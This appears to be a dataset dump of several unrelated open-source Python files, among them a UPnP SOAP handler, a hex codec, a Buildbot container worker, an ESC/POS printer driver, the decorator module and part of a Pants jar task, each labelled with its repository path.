keywords['X_UPnPClient'] = 'PLAYSTATION3'
if(headers.has_key('user-agent') and
headers['user-agent'].find('Philips-Software-WebClient/4.32') == 0):
keywords['X_UPnPClient'] = 'Philips-TV'
for k, v in kwargs.items():
keywords[str(k)] = v
self.info('call %s %s', methodName, keywords)
if hasattr(function, "useKeywords"):
d = defer.maybeDeferred(function, **keywords)
else:
d = defer.maybeDeferred(function, *args, **keywords)
d.addCallback(self._gotResult, request, methodName, ns)
d.addErrback(self._gotError, request, methodName, ns)
return server.NOT_DONE_YET
def decode_result(self, element):
type = element.get('{http://www.w3.org/1999/XMLSchema-instance}type')
if type is not None:
try:
prefix, local = type.split(":")
if prefix == 'xsd':
type = local
except ValueError:
pass
if type == "integer" or type == "int":
return int(element.text)
if type == "float" or type == "double":
return float(element.text)
if type == "boolean":
return element.text == "true"
return element.text or ""
|
clumsy/intellij-community | refs/heads/master | python/testData/joinLines/BinaryOp.py | 83 | a = <caret>1 +\
2
|
jamesrobertlloyd/gpss-research | refs/heads/master | experiments/2013-12-16-extrap-GPSS-full.py | 4 | Experiment(description='Trying latest code on extrapolation task',
data_dir='../data/tsdlr_9010/',
max_depth=10,
random_order=False,
k=1,
debug=False,
local_computation=False,
n_rand=9,
sd=2,
jitter_sd=0.1,
max_jobs=500,
verbose=False,
make_predictions=True,
skip_complete=True,
results_dir='../results/2013-12-16-extrap-GPSS-full/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=1,
period_heuristic=3,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()', # Starting mean
kernel='ff.NoiseKernel()', # Starting kernel
lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})])
|
s3nk4s/flaskTutorials | refs/heads/master | FlaskApp/FlaskApp/venv/lib/python2.7/encodings/hex_codec.py | 528 | """ Python 'hex_codec' Codec - 2-digit hex content transfer encoding
Unlike most of the other codecs which target Unicode, this codec
will return Python string objects for both encode and decode.
Written by Marc-Andre Lemburg ([email protected]).
"""
import codecs, binascii
### Codec APIs
def hex_encode(input,errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.b2a_hex(input)
return (output, len(input))
def hex_decode(input,errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.a2b_hex(input)
return (output, len(input))
class Codec(codecs.Codec):
def encode(self, input,errors='strict'):
return hex_encode(input,errors)
def decode(self, input,errors='strict'):
return hex_decode(input,errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
assert self.errors == 'strict'
return binascii.b2a_hex(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
assert self.errors == 'strict'
return binascii.a2b_hex(input)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='hex',
encode=hex_encode,
decode=hex_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
marioaugustorama/yowsup | refs/heads/master | yowsup/layers/axolotl/protocolentities/notification_encrypt.py | 18 | from yowsup.common import YowConstants
from yowsup.layers.protocol_notifications.protocolentities import NotificationProtocolEntity
from yowsup.structs import ProtocolTreeNode
class EncryptNotification(NotificationProtocolEntity):
"""
<notification t="1419824928" id="2451228097" from="s.whatsapp.net" type="encrypt">
<count value="9">
</count>
</notification>
"""
def __init__(self, count, timestamp, _id = None, notify = None, offline = None):
super(EncryptNotification, self).__init__("encrypt", _id, YowConstants.WHATSAPP_SERVER, timestamp, notify, offline)
self.setProps(count)
def setProps(self, count):
self.count = int(count)
def getCount(self):
return self.count
def toProtocolTreeNode(self):
node = super(EncryptNotification, self).toProtocolTreeNode()
countNode = ProtocolTreeNode("count", {"value": str(self.count)})
node.addChild(countNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = NotificationProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = EncryptNotification
entity.setProps(node.getChild("count")["value"])
return entity |
dbo/selenium | refs/heads/master | py/test/selenium/webdriver/common/appcache_tests.py | 5 | #!/usr/bin/python
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common.html5.application_cache import ApplicationCache
import unittest
import pytest
class AppCacheTests(unittest.TestCase):
@pytest.mark.ignore_firefox
def testWeCanGetTheStatusOfTheAppCache(self):
self._loadPage('html5Page')
self.driver.implicitly_wait(2)
app_cache = self.driver.application_cache
status = app_cache.status
while status == ApplicationCache.DOWNLOADING:
status = app_cache.status
self.assertEquals(ApplicationCache.UNCACHED, app_cache.status)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
|
wainersm/buildbot | refs/heads/master | master/buildbot/worker/hyper.py | 9 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from twisted.internet import reactor as global_reactor
from twisted.internet import defer
from twisted.internet import threads
from twisted.python import threadpool
from buildbot import config
from buildbot.interfaces import LatentWorkerFailedToSubstantiate
from buildbot.util import service
from buildbot.util.logger import Logger
from buildbot.worker.docker import DockerBaseWorker
try:
import docker # noqa pylint: disable=unused-import
from docker.errors import NotFound
from hyper_sh import Client as Hyper
except ImportError:
Hyper = None
log = Logger()
class HyperLatentManager(service.SharedService):
"""A shared service class that manages all the connections to the hyper cloud
There is one instance of this manager per host, accesskey, secretkey tuple.
This manager manages its own thread pull, as Hyper_sh is blocking.
You can change the maximum number of concurrent access to hyper using
import buildbot.worker.hyper
buildbot.worker.hyper.HyperLatentManager.MAX_THREADS = 1
This feature is undocumented for now, as we are not sure if this is ideal API.
"""
MAX_THREADS = 5
def __init__(self, hyper_host, hyper_accesskey, hyper_secretkey):
service.SharedService.__init__(self)
# Prepare the parameters for the Docker Client object.
self._client_args = {'clouds': {
hyper_host: {
"accesskey": hyper_accesskey,
"secretkey": hyper_secretkey
}
}}
def startService(self):
self._threadPool = threadpool.ThreadPool(
minthreads=1, maxthreads=self.MAX_THREADS, name='hyper')
self._threadPool.start()
self._client = Hyper(self._client_args)
@property
def client(self):
return self._client
def stopService(self):
self.client.close()
return self._threadPool.stop()
def deferToThread(self, reactor, meth, *args, **kwargs):
return threads.deferToThreadPool(reactor, self._threadPool, meth, *args, **kwargs)
class HyperLatentWorker(DockerBaseWorker):
"""hyper.sh is a docker CaaS company"""
instance = None
ALLOWED_SIZES = ['s1', 's2', 's3', 's4',
'm1', 'm2', 'm3', 'l1', 'l2', 'l3']
image = None
reactor = global_reactor
def checkConfig(self, name, password, hyper_host,
hyper_accesskey, hyper_secretkey, image, hyper_size="s3", masterFQDN=None, **kwargs):
DockerBaseWorker.checkConfig(self, name, password, image=image, masterFQDN=masterFQDN, **kwargs)
if not Hyper:
config.error("The python modules 'docker-py>=1.4' and 'hyper_sh' are needed to use a"
" HyperLatentWorker")
if hyper_size not in self.ALLOWED_SIZES:
config.error("Size is not valid {!r} vs {!r}".format(
hyper_size, self.ALLOWED_SIZES))
@property
def client(self):
if self.manager is None:
return None
return self.manager.client
@defer.inlineCallbacks
def reconfigService(self, name, password, hyper_host,
hyper_accesskey, hyper_secretkey, image, hyper_size="s3", masterFQDN=None, **kwargs):
yield DockerBaseWorker.reconfigService(self, name, password, image=image,
masterFQDN=masterFQDN, **kwargs)
self.manager = yield HyperLatentManager.getService(self.master, hyper_host, hyper_accesskey,
hyper_secretkey)
self.size = hyper_size
def deferToThread(self, meth, *args, **kwargs):
return self.manager.deferToThread(self.reactor, meth, *args, **kwargs)
@defer.inlineCallbacks
def start_instance(self, build):
image = yield build.render(self.image)
yield self.deferToThread(self._thd_start_instance, image)
defer.returnValue(True)
def _thd_cleanup_instance(self):
container_name = self.getContainerName()
instances = self.client.containers(
all=1,
filters=dict(name=container_name))
for instance in instances:
# hyper filtering will match 'hyper12" if you search for 'hyper1' !
if "".join(instance['Names']).strip("/") != container_name:
continue
try:
self.client.remove_container(instance['Id'], v=True, force=True)
except NotFound:
pass # that's a race condition
except docker.errors.APIError as e:
if "Conflict operation on container" not in str(e):
raise
# else: also race condition.
def _thd_start_instance(self, image):
t1 = time.time()
self._thd_cleanup_instance()
t2 = time.time()
instance = self.client.create_container(
image,
environment=self.createEnvironment(),
labels={
'sh_hyper_instancetype': self.size
},
name=self.getContainerName()
)
t3 = time.time()
if instance.get('Id') is None:
raise LatentWorkerFailedToSubstantiate(
'Failed to start container'
)
instance['image'] = image
self.instance = instance
self.client.start(instance)
t4 = time.time()
log.debug('{name}:{containerid}: Container started in {total_time:.2f}', name=self.name,
containerid=self.shortid,
clean_time=t2 - t1, create_time=t3 - t2, start_time=t4 - t3, total_time=t4 - t1)
return [instance['Id'], image]
def stop_instance(self, fast=False):
if self.instance is None:
# be gentle. Something may just be trying to alert us that an
# instance never attached, and it's because, somehow, we never
# started.
return defer.succeed(None)
return self.deferToThread(self._thd_stop_instance, fast)
def _thd_stop_instance(self, fast):
if self.instance is None:
return
log.debug('{name}:{containerid}: Stopping container', name=self.name,
containerid=self.shortid)
t1 = time.time()
try:
self.client.stop(self.instance['Id'])
except NotFound:
# That's ok. container was already deleted, probably by an admin
# lets fail nicely
log.warn('{name}:{containerid}: container was already deleted!', name=self.name,
containerid=self.shortid)
self.instance = None
return
t2 = time.time()
if not fast:
self.client.wait(self.instance['Id'])
t3 = time.time()
self.client.remove_container(self.instance['Id'], v=True, force=True)
t4 = time.time()
log.debug('{name}:{containerid}: Stopped container in {total_time:.2f}', name=self.name,
containerid=self.shortid,
stop_time=t2 - t1, wait_time=t3 - t2, remove_time=t4 - t3, total_time=t4 - t1)
self.instance = None
|
minhphung171093/GreenERP_V9 | refs/heads/master | openerp/addons/hw_escpos/escpos/printer.py | 101 | #!/usr/bin/python
import usb.core
import usb.util
import serial
import socket
from escpos import *
from constants import *
from exceptions import *
from time import sleep
class Usb(Escpos):
""" Define USB printer """
def __init__(self, idVendor, idProduct, interface=0, in_ep=0x82, out_ep=0x01):
"""
@param idVendor : Vendor ID
@param idProduct : Product ID
@param interface : USB device interface
@param in_ep : Input end point
@param out_ep : Output end point
"""
self.errorText = "ERROR PRINTER\n\n\n\n\n\n"+PAPER_FULL_CUT
self.idVendor = idVendor
self.idProduct = idProduct
self.interface = interface
self.in_ep = in_ep
self.out_ep = out_ep
self.open()
def open(self):
""" Search device on USB tree and set is as escpos device """
self.device = usb.core.find(idVendor=self.idVendor, idProduct=self.idProduct)
if self.device is None:
raise NoDeviceError()
try:
if self.device.is_kernel_driver_active(self.interface):
self.device.detach_kernel_driver(self.interface)
self.device.set_configuration()
usb.util.claim_interface(self.device, self.interface)
except usb.core.USBError as e:
raise HandleDeviceError(e)
def close(self):
i = 0
while True:
try:
if not self.device.is_kernel_driver_active(self.interface):
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(self.interface)
usb.util.dispose_resources(self.device)
else:
self.device = None
return True
except usb.core.USBError as e:
i += 1
if i > 10:
return False
sleep(0.1)
def _raw(self, msg):
""" Print any command sent in raw format """
if len(msg) != self.device.write(self.out_ep, msg, self.interface):
self.device.write(self.out_ep, self.errorText, self.interface)
raise TicketNotPrinted()
def __extract_status(self):
maxiterate = 0
rep = None
while rep == None:
maxiterate += 1
if maxiterate > 10000:
raise NoStatusError()
r = self.device.read(self.in_ep, 20, self.interface).tolist()
while len(r):
rep = r.pop()
return rep
def get_printer_status(self):
status = {
'printer': {},
'offline': {},
'error' : {},
'paper' : {},
}
self.device.write(self.out_ep, DLE_EOT_PRINTER, self.interface)
printer = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_OFFLINE, self.interface)
offline = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_ERROR, self.interface)
error = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_PAPER, self.interface)
paper = self.__extract_status()
status['printer']['status_code'] = printer
status['printer']['status_error'] = not ((printer & 147) == 18)
status['printer']['online'] = not bool(printer & 8)
status['printer']['recovery'] = bool(printer & 32)
status['printer']['paper_feed_on'] = bool(printer & 64)
status['printer']['drawer_pin_high'] = bool(printer & 4)
status['offline']['status_code'] = offline
status['offline']['status_error'] = not ((offline & 147) == 18)
status['offline']['cover_open'] = bool(offline & 4)
status['offline']['paper_feed_on'] = bool(offline & 8)
status['offline']['paper'] = not bool(offline & 32)
status['offline']['error'] = bool(offline & 64)
status['error']['status_code'] = error
status['error']['status_error'] = not ((error & 147) == 18)
status['error']['recoverable'] = bool(error & 4)
status['error']['autocutter'] = bool(error & 8)
status['error']['unrecoverable'] = bool(error & 32)
status['error']['auto_recoverable'] = not bool(error & 64)
status['paper']['status_code'] = paper
status['paper']['status_error'] = not ((paper & 147) == 18)
status['paper']['near_end'] = bool(paper & 12)
status['paper']['present'] = not bool(paper & 96)
return status
def __del__(self):
""" Release USB interface """
if self.device:
self.close()
self.device = None
class Serial(Escpos):
""" Define Serial printer """
def __init__(self, devfile="/dev/ttyS0", baudrate=9600, bytesize=8, timeout=1):
"""
@param devfile : Device file under dev filesystem
@param baudrate : Baud rate for serial transmission
@param bytesize : Serial buffer size
@param timeout : Read/Write timeout
"""
self.devfile = devfile
self.baudrate = baudrate
self.bytesize = bytesize
self.timeout = timeout
self.open()
def open(self):
""" Setup serial port and set is as escpos device """
self.device = serial.Serial(port=self.devfile, baudrate=self.baudrate, bytesize=self.bytesize, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=self.timeout, dsrdtr=True)
if self.device is not None:
print "Serial printer enabled"
else:
print "Unable to open serial printer on: %s" % self.devfile
def _raw(self, msg):
""" Print any command sent in raw format """
self.device.write(msg)
def __del__(self):
""" Close Serial interface """
if self.device is not None:
self.device.close()
class Network(Escpos):
""" Define Network printer """
def __init__(self,host,port=9100):
"""
@param host : Printer's hostname or IP address
@param port : Port to write to
"""
self.host = host
self.port = port
self.open()
def open(self):
""" Open TCP socket and set it as escpos device """
self.device = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.device.connect((self.host, self.port))
if self.device is None:
print "Could not open socket for %s" % self.host
def _raw(self, msg):
self.device.send(msg)
def __del__(self):
""" Close TCP connection """
self.device.close()
|
tipsqueal/PuPPyREST | refs/heads/master | puppy/__init__.py | 1 | import puppy.puppy_schema
import puppy.core_routes
import puppy.post_routes
import puppy.user_routes
|
hddn/studentsdb | refs/heads/master | students/views/exams.py | 1 | # -*- coding: utf-8 -*-
from django.views.generic import ListView
from students.models import Exam
from students.util import get_current_group
EXAMS_NUM = 3 # number of exams for pagination
class ExamsListView(ListView):
template_name = 'students/exams.html'
model = Exam
paginate_by = EXAMS_NUM
context_object_name = 'exams'
def get_queryset(self):
current_group = get_current_group(self.request)
if current_group:
queryset = Exam.objects.filter(group=current_group)
else:
queryset = Exam.objects.all()
order_by = self.request.GET.get('order_by', '')
if order_by in ('subject', 'teacher', 'group', 'date'):
queryset = queryset.order_by(order_by)
if self.request.GET.get('reverse', '') == '1':
queryset = queryset.reverse()
return queryset
|
UrQA/URQA-Server | refs/heads/master | external/google-breakpad/src/tools/gyp/test/mac/gyptest-missing-cfbundlesignature.py | 298 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that an Info.plist with CFBundleSignature works.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test.gyp', chdir='missing-cfbundlesignature')
test.build('test.gyp', test.ALL, chdir='missing-cfbundlesignature')
test.built_file_must_match('mytarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.built_file_must_match('myothertarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.built_file_must_match('thirdtarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.pass_test()
|
ycliuhw/kman | refs/heads/master | kman/api/urls.py | 1 | from django.conf.urls import url
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from . import views
urlpatterns = [
url(
r'^die/(?P<k>\+?[0-9]*)/?',
csrf_exempt(
xframe_options_exempt(views.DieView.as_view())
),
name='die'
),
]
|
odubno/microblog | refs/heads/master | venv/lib/python2.7/site-packages/decorator.py | 112 | ########################## LICENCE ###############################
# Copyright (c) 2005-2012, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see http://pypi.python.org/pypi/decorator
for the documentation.
"""
__version__ = '3.4.0'
__all__ = ["decorator", "FunctionMaker", "contextmanager"]
import sys, re, inspect
if sys.version >= '3':
from inspect import getfullargspec
def get_init(cls):
return cls.__init__
else:
class getfullargspec(object):
"A quick and dirty replacement for getfullargspec for Python 2.X"
def __init__(self, f):
self.args, self.varargs, self.varkw, self.defaults = \
inspect.getargspec(f)
self.kwonlyargs = []
self.kwonlydefaults = None
def __iter__(self):
yield self.args
yield self.varargs
yield self.varkw
yield self.defaults
def get_init(cls):
return cls.__init__.im_func
DEF = re.compile('\s*def\s*([_\w][_\w\d]*)\s*\(')
# basic functionality
class FunctionMaker(object):
"""
An object with the ability to create functions with a given signature.
It has attributes name, doc, module, signature, defaults, dict and
methods update and make.
"""
def __init__(self, func=None, name=None, signature=None,
defaults=None, doc=None, module=None, funcdict=None):
self.shortsignature = signature
if func:
# func can be a class or a callable, but not an instance method
self.name = func.__name__
if self.name == '<lambda>': # small hack for lambda functions
self.name = '_lambda_'
self.doc = func.__doc__
self.module = func.__module__
if inspect.isfunction(func):
argspec = getfullargspec(func)
self.annotations = getattr(func, '__annotations__', {})
for a in ('args', 'varargs', 'varkw', 'defaults', 'kwonlyargs',
'kwonlydefaults'):
setattr(self, a, getattr(argspec, a))
for i, arg in enumerate(self.args):
setattr(self, 'arg%d' % i, arg)
if sys.version < '3': # easy way
self.shortsignature = self.signature = \
inspect.formatargspec(
formatvalue=lambda val: "", *argspec)[1:-1]
else: # Python 3 way
allargs = list(self.args)
allshortargs = list(self.args)
if self.varargs:
allargs.append('*' + self.varargs)
allshortargs.append('*' + self.varargs)
elif self.kwonlyargs:
allargs.append('*') # single star syntax
for a in self.kwonlyargs:
allargs.append('%s=None' % a)
allshortargs.append('%s=%s' % (a, a))
if self.varkw:
allargs.append('**' + self.varkw)
allshortargs.append('**' + self.varkw)
self.signature = ', '.join(allargs)
self.shortsignature = ', '.join(allshortargs)
self.dict = func.__dict__.copy()
# func=None happens when decorating a caller
if name:
self.name = name
if signature is not None:
self.signature = signature
if defaults:
self.defaults = defaults
if doc:
self.doc = doc
if module:
self.module = module
if funcdict:
self.dict = funcdict
# check existence required attributes
assert hasattr(self, 'name')
if not hasattr(self, 'signature'):
raise TypeError('You are decorating a non function: %s' % func)
def update(self, func, **kw):
"Update the signature of func with the data in self"
func.__name__ = self.name
func.__doc__ = getattr(self, 'doc', None)
func.__dict__ = getattr(self, 'dict', {})
func.func_defaults = getattr(self, 'defaults', ())
func.__kwdefaults__ = getattr(self, 'kwonlydefaults', None)
func.__annotations__ = getattr(self, 'annotations', None)
callermodule = sys._getframe(3).f_globals.get('__name__', '?')
func.__module__ = getattr(self, 'module', callermodule)
func.__dict__.update(kw)
def make(self, src_templ, evaldict=None, addsource=False, **attrs):
"Make a new function from a given template and update the signature"
src = src_templ % vars(self) # expand name and signature
evaldict = evaldict or {}
mo = DEF.match(src)
if mo is None:
raise SyntaxError('not a valid function template\n%s' % src)
name = mo.group(1) # extract the function name
names = set([name] + [arg.strip(' *') for arg in
self.shortsignature.split(',')])
for n in names:
if n in ('_func_', '_call_'):
raise NameError('%s is overridden in\n%s' % (n, src))
if not src.endswith('\n'): # add a newline just for safety
src += '\n' # this is needed in old versions of Python
try:
code = compile(src, '<string>', 'single')
# print >> sys.stderr, 'Compiling %s' % src
exec code in evaldict
except:
print >> sys.stderr, 'Error in generated code:'
print >> sys.stderr, src
raise
func = evaldict[name]
if addsource:
attrs['__source__'] = src
self.update(func, **attrs)
return func
@classmethod
def create(cls, obj, body, evaldict, defaults=None,
doc=None, module=None, addsource=True, **attrs):
"""
Create a function from the strings name, signature and body.
evaldict is the evaluation dictionary. If addsource is true an attribute
__source__ is added to the result. The attributes attrs are added,
if any.
"""
if isinstance(obj, str): # "name(signature)"
name, rest = obj.strip().split('(', 1)
signature = rest[:-1] #strip a right parens
func = None
else: # a function
name = None
signature = None
func = obj
self = cls(func, name, signature, defaults, doc, module)
ibody = '\n'.join(' ' + line for line in body.splitlines())
return self.make('def %(name)s(%(signature)s):\n' + ibody,
evaldict, addsource, **attrs)
def decorator(caller, func=None):
"""
decorator(caller) converts a caller function into a decorator;
decorator(caller, func) decorates a function using a caller.
"""
if func is not None: # returns a decorated function
evaldict = func.func_globals.copy()
evaldict['_call_'] = caller
evaldict['_func_'] = func
return FunctionMaker.create(
func, "return _call_(_func_, %(shortsignature)s)",
evaldict, undecorated=func, __wrapped__=func)
else: # returns a decorator
if inspect.isclass(caller):
name = caller.__name__.lower()
callerfunc = get_init(caller)
doc = 'decorator(%s) converts functions/generators into ' \
'factories of %s objects' % (caller.__name__, caller.__name__)
fun = getfullargspec(callerfunc).args[1] # second arg
elif inspect.isfunction(caller):
name = '_lambda_' if caller.__name__ == '<lambda>' \
else caller.__name__
callerfunc = caller
doc = caller.__doc__
fun = getfullargspec(callerfunc).args[0] # first arg
else: # assume caller is an object with a __call__ method
name = caller.__class__.__name__.lower()
callerfunc = caller.__call__.im_func
doc = caller.__call__.__doc__
fun = getfullargspec(callerfunc).args[1] # second arg
evaldict = callerfunc.func_globals.copy()
evaldict['_call_'] = caller
evaldict['decorator'] = decorator
return FunctionMaker.create(
'%s(%s)' % (name, fun),
'return decorator(_call_, %s)' % fun,
evaldict, undecorated=caller, __wrapped__=caller,
doc=doc, module=caller.__module__)
######################### contextmanager ########################
def __call__(self, func):
'Context manager decorator'
return FunctionMaker.create(
func, "with _self_: return _func_(%(shortsignature)s)",
dict(_self_=self, _func_=func), __wrapped__=func)
try: # Python >= 3.2
from contextlib import _GeneratorContextManager
ContextManager = type(
'ContextManager', (_GeneratorContextManager,), dict(__call__=__call__))
except ImportError: # Python >= 2.5
from contextlib import GeneratorContextManager
def __init__(self, f, *a, **k):
return GeneratorContextManager.__init__(self, f(*a, **k))
ContextManager = type(
'ContextManager', (GeneratorContextManager,),
dict(__call__=__call__, __init__=__init__))
contextmanager = decorator(ContextManager)
|
tiy1807/PythonUtils | refs/heads/master | PythonUtils/list_input.py | 1 | # ------------------------------------------------------------------------------
# Class ListInput
#
# Allows the same Input object to be requested multiple times, either a
# predefined number of times or until the user enters the 'finished' sequence.
# ------------------------------------------------------------------------------
from PythonUtils.option import Option
from PythonUtils.user_input import UserInput
class ListInput:
REPEAT_TILL_TERMINATED = 0
REPEAT_FINITELY = 1
def __init__(self, input, repeats):
self.input = input
finished_opt = Option(name="\\finished", short_name="\\f", help_text="Stops asking this question")
self.input.master_options.append(finished_opt)
self.input.default_opt = finished_opt
self.input.default = finished_opt.short_name
self.repeats = repeats
if self.repeats == self.REPEAT_TILL_TERMINATED:
self.termination = self.REPEAT_TILL_TERMINATED
elif self.repeats > 0:
self.termination = self.REPEAT_FINITELY
self.answer = []
def get_answer(self):
return self.answer
def request_input(self):
ask_again = True
number_of_asks = 0
while ask_again:
rc = self.input.request_input()
answer = self.input.get_answer()
if rc == UserInput.SUCCESS:
if self.termination == self.REPEAT_FINITELY:
ask_again = (number_of_asks < self.repeats)
elif self.termination == self.REPEAT_TILL_TERMINATED:
ask_again = (answer != "\\finished")
else:
raise ValueError()
else:
ask_again = (rc != UserInput.ABORTED)
if (answer != "\\finished"):
self.answer.append(self.input.get_answer())
number_of_asks += 1
return rc
|
foursquare/pants | refs/heads/master | src/python/pants/backend/jvm/tasks/jar_task.py | 1 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import shutil
import tempfile
from abc import abstractmethod
from builtins import object
from contextlib import contextmanager
import six
from six import binary_type, string_types
from twitter.common.collections import maybe_list
from pants.backend.jvm.argfile import safe_args
from pants.backend.jvm.subsystems.jar_tool import JarTool
from pants.backend.jvm.targets.java_agent import JavaAgent
from pants.backend.jvm.targets.jvm_binary import Duplicate, JarRules, JvmBinary, Skip
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.java.jar.manifest import Manifest
from pants.java.util import relativize_classpath
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import safe_mkdtemp
from pants.util.meta import AbstractClass
class Jar(object):
"""Encapsulates operations to build up or update a jar file.
Upon construction the jar is conceptually opened for writes. The write methods are called to
add to the jar's contents and then changes are finalized with a call to close. If close is not
called the staged changes will be lost.
:API: public
"""
class Error(Exception):
"""Indicates an error creating or updating a jar on disk."""
class Entry(AbstractClass):
"""An entry to be written to a jar."""
def __init__(self, dest):
self._dest = dest
@property
def dest(self):
"""The destination path of the entry in the jar."""
return self._dest
def split_manifest(self):
"""Splits this entry into a jar non-manifest part and a manifest part.
Some entries represent a manifest, some do not, and others have both a manifest entry and
non-manifest entries; as such, callers must be prepared to handle ``None`` entries.
:returns: A tuple of (non-manifest Entry, manifest Entry).
:rtype: tuple of (:class:`Jar.Entry`, :class:`Jar.Entry`)
"""
if self.dest == Manifest.PATH:
return None, self
else:
return self, None
@abstractmethod
def materialize(self, scratch_dir):
"""Materialize this entry's source data into a filesystem path.
:param string scratch_dir: A temporary directory that may be used to do any work required
to materialize the entry as a source file. The caller is responsible for cleaning up
`scratch_dir` after the jar is closed.
:returns: The path to the source data.
"""
class FileSystemEntry(Entry):
"""An entry backed by an existing file on disk."""
def __init__(self, src, dest=None):
super(Jar.FileSystemEntry, self).__init__(dest)
self._src = src
def split_manifest(self):
if not os.path.isdir(self._src):
return super(Jar.FileSystemEntry, self).split_manifest()
if self.dest and self.dest == os.path.commonprefix([self.dest, Manifest.PATH]):
manifest_relpath = os.path.relpath(Manifest.PATH, self.dest)
else:
manifest_relpath = Manifest.PATH
